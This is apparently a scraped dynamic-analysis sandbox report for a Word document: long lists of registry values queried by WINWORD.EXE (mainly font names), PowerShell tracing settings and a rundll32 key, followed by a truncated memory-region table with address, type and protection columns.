C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bauhaus 93
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bell MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bernard MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Blackadder ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Poster Compressed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Book Antiqua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookman Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookshelf Symbol 7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bradley Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Britannic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Broadway
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Browallia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BrowalliaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Brush Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Californian FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calisto MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Candara
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Castellar
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Centaur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Schoolbook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Chiller
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Colonna MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Comic Sans MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Consolas
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Constantia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cooper Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Corbel
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cordia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
CordiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Courier New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Curlz MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DaunPenh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
David
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DilleniaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DokChampa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ebrima
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Edwardian Script ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Elephant
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Engravers MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Bold ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Demi ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Light ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Medium ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Estrangelo Edessa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EucrosiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Euphemia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Felix Titling
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Footlight MT Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Forte
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Book
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Heavy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FrankRuehl
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FreesiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Freestyle Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
French Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gabriola
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Garamond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gautami
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Georgia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gigi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Ext Condensed Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gisha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gloucester MT Extra Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Stout
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Haettenschweiler
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harlow Solid Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harrington
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
High Tower Text
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Impact
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Imprint MT Shadow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Informal Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
IrisUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Iskoola Pota
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
JasmineUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Jokerman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Juice ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kalinga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kartika
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Khmer UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KodchiangUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kokila
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kristen ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kunstler Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lao UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Latha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Leelawadee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Levenim MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LilyUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Bright
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Calligraphy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Console
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Fax
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Handwriting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Typewriter
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Unicode
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Magneto
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Maiandra GD
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mangal
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Marlett
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Matura MT Script Capitals
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Himalaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft New Tai Lue
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft PhagsPa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Tai Le
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Uighur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Yi Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mistral
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Modern No. 20
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mongolian Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Monotype Corsiva
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MoolBoran
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Outlook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Specialty
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MT Extra
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MV Boli
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Narkisim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Engraved
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Solid
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Nyala
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
OCR A Extended
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Old English Text MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Onyx
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palace Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palatino Linotype
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Papyrus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Parchment
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua Titling MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Plantagenet Cherokee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Playbill
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Poor Richard
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Pristina
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Raavi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rage Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ravie
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rod
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sakkal Majalla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Script MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Print
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Semibold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shonar Bangla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Showcard Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shruti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Snap ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Stencil
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sylfaen
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tempus Sans ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Times New Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Traditional Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Trebuchet MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tunga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Utsaah
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vani
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Verdana
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vijaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Viner Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vivaldi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vladimir Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vrinda
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Webdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wide Latin
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 2
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 3
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F6078
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LastPurgeTime
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
WORDFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F6078
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Settings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ZoomApp
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTF
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTA
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\SysWOW64\rundll32.exe
|
SavedLegacySettings
|
There are 326 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1E10000
|
unkown
|
page readonly
|
||
2F70000
|
unkown
|
page read and write
|
||
2CD4000
|
unkown
|
page read and write
|
||
4E2000
|
heap default
|
page read and write
|
||
57D000
|
unkown
|
page read and write
|
||
6CC000
|
unkown
|
page read and write
|
||
440000
|
unkown
|
page read and write
|
||
1B340000
|
unkown
|
page read and write
|
||
2F18000
|
unkown
|
page read and write
|
||
2364000
|
heap private
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
27A0000
|
unkown
|
page readonly
|
||
2920000
|
unkown
|
page read and write
|
||
2920000
|
unkown
|
page read and write
|
||
24E0000
|
unkown
|
page readonly
|
||
4D9000
|
heap default
|
page read and write
|
||
2C00000
|
unkown
|
page write copy
|
||
870000
|
unkown
|
page readonly
|
||
40E000
|
heap default
|
page read and write
|
||
180000
|
unkown
|
page execute and read and write
|
||
870000
|
unkown
|
page readonly
|
||
17B000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
2B00000
|
heap private
|
page read and write
|
||
3FD000
|
unkown
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
22F000
|
unkown
|
page execute and read and write
|
||
2920000
|
unkown
|
page read and write
|
||
2120000
|
unkown
|
page readonly
|
||
260000
|
heap private
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
289E000
|
unkown
|
page read and write
|
||
7FF001F0000
|
unkown
|
page read and write
|
||
140000
|
unkown
|
page readonly
|
||
45B000
|
heap default
|
page read and write
|
||
40D000
|
heap default
|
page read and write
|
||
1B960000
|
unkown
|
page read and write
|
||
1001F000
|
unkown
|
page execute and read and write
|
||
C5E000
|
unkown
|
page read and write
|
||
5AC000
|
unkown
|
page read and write
|
||
42C000
|
heap default
|
page read and write
|
||
2920000
|
unkown
|
page read and write
|
||
2F0000
|
heap default
|
page read and write
|
||
2DA0000
|
unkown
|
page readonly
|
||
21F0000
|
unkown
|
page read and write
|
||
450000
|
unkown
|
page readonly
|
||
3632000
|
unkown
|
page read and write
|
||
3A42000
|
unkown
|
page read and write
|
||
6F0000
|
unkown
|
page readonly
|
||
2920000
|
unkown
|
page read and write
|
||
2EA7000
|
unkown
|
page read and write
|
||
12EC0000
|
unkown
|
page read and write
|
||
CB8000
|
heap private
|
page read and write
|
||
1D6000
|
unkown
|
page read and write
|
||
7FF0003C000
|
unkown
|
page execute and read and write
|
||
1FF7000
|
unkown
|
page readonly
|
||
2FF9000
|
unkown
|
page read and write
|
||
35A8000
|
unkown
|
page read and write
|
||
1C90E000
|
unkown
|
page read and write
|
||
5D0000
|
unkown
|
page readonly
|
||
6D8000
|
heap private
|
page read and write
|
||
43F000
|
heap default
|
page read and write
|
||
3595000
|
unkown
|
page read and write
|
||
46B000
|
heap default
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
150000
|
unkown
|
page read and write
|
||
648000
|
heap default
|
page read and write
|
||
20F000
|
unkown
|
page execute and read and write
|
||
470000
|
heap default
|
page read and write
|
||
7FF001C0000
|
unkown
|
page execute and read and write
|
||
360000
|
unkown
|
page readonly
|
||
3D7000
|
heap default
|
page read and write
|
||
23C2000
|
heap private
|
page read and write
|
||
7FF00290000
|
unkown
|
page execute and read and write
|
||
4A7000
|
heap default
|
page read and write
|
||
430000
|
unkown
|
page readonly
|
||
31EF000
|
unkown
|
page read and write
|
||
23C0000
|
heap private
|
page read and write
|
||
12C75000
|
unkown
|
page read and write
|
||
7FF00210000
|
unkown
|
page execute and read and write
|
||
290000
|
unkown
|
page readonly
|
||
1001F000
|
unkown
|
page execute and read and write
|
||
1E67000
|
heap private
|
page read and write
|
||
3030000
|
unkown
|
page read and write
|
||
E0000
|
unkown
|
page read and write
|
||
35BE000
|
unkown
|
page read and write
|
||
22A7000
|
unkown
|
page readonly
|
||
220D000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
362B000
|
unkown
|
page read and write
|
||
2FD5000
|
unkown
|
page read and write
|
||
2090000
|
unkown
|
page read and write
|
||
870000
|
unkown
|
page readonly
|
||
2070000
|
unkown
|
page read and write
|
||
22F000
|
unkown
|
page execute and read and write
|
||
256E000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
7FF00230000
|
unkown
|
page execute and read and write
|
||
51B000
|
heap default
|
page read and write
|
||
7FF000FA000
|
unkown
|
page execute and read and write
|
||
2920000
|
unkown
|
page read and write
|
||
22D0000
|
unkown
|
page readonly
|
||
1C90000
|
heap private
|
page read and write
|
||
2CC0000
|
unkown
|
page write copy
|
||
222F000
|
unkown
|
page read and write
|
||
3588000
|
unkown
|
page read and write
|
||
CC000
|
unkown
|
page read and write
|
||
7FF00170000
|
unkown
|
page execute and read and write
|
||
170000
|
unkown
|
